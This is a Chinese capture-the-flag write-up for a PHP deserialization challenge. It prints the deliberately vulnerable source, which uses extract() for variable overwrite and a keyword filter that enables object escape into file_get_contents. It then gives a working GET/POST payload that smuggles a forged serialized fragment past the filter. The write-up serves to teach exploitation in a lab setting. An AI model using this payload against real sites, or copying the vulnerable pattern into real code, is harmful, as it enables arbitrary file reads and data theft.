[安洵杯 2019]easy_serialize_php


[安洵杯 2019]easy_serialize_php

这题有点难度,记录一下

环境源码:

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo 'source_code';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 

传入highlight_file直接显示index的源码,没有经过任何处理,同理传入phpinfo也可以直接看到phpinfo页,提示里面可能有东西,所以得仔细找找,直接搜索flag字样找到一个值为not_flag,所以应该不是这个,找了一圈发现一个可疑文件,先记录一下(d0g3_f1ag.php)。

回来继续看源码,当传入show_image时,就会涉及到很多点了,一一分析。

反序列化对象是$serialize_info,而它又是经过filter(serialize($_SESSION))处理的,$_SESSION值在一开始就被销毁(unset)了,后面的可控因素只有function变量,但function已经被拿来传show_image了,所以得继续往下看

extract($_POST)

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

例子:

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>

结果:

$a = Cat; $b = Dog; $c = Horse

简单理解就是把我们post传入的值变成变量处理。

根据文档介绍和例题演示,这里是可以进行变量覆盖的,在这之上的$_SESSION["user"] 和 $_SESSION['function'] 都可以覆盖掉,那如果要覆盖他们的话,目的是什么呢?

有点摸不着头脑了,去找大佬wp看了一下,这里涉及到一个反序列化中的对象逃逸问题,其实也很好理解,PHP序列化对象后的结果是一串字符串,例如:

a:3:{s:4:"user";s:8:"flagflag";s:8:"function";s:10:"show_image";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

这中间数字的存在意义就是:他会往后读这么多个字符,不管里面是不是有这么多个字符,反正他就往后读这么多个字符。

尝试构造对象逃逸:

$_SESSION["user"] = 'guest';			
$_SESSION['function'] = "show_image";	//原参数

//模拟使用extract($_POST)函数
//$_SESSION["user"] = 'flag';
$_SESSION['function'] = ';s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';
//$_SESSION['img'] = 'Z3Vlc3RfaW1nLnBuZw==';

$_SESSION['img'] = base64_encode('guest_img.png');

echo serialize($_SESSION);

结果:

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:73:";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

分析这个结果,我们需要将标记出的地方变为user的值即可,除去guest一共22个字符(4+4+4+4+3+3),即可以构造user参数为:flagflagflagflagphpphp,这里的值会被替换为为空。

测试:

GET:
http://892b87d4-73f4-4684-accc-527fab430d3d.node4.buuoj.cn:81/index.php?f=show_image

POST:
_SESSION[user]=flagflagflagflagphpphp&_SESSION[function]=;s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

嗯?检查发现文件搞错了,应该是我们在phpinfo里找到的那个文件(d0g3_f1ag.php),重新编码传参

套娃......

继续改参,继续传

终于搞定了@_@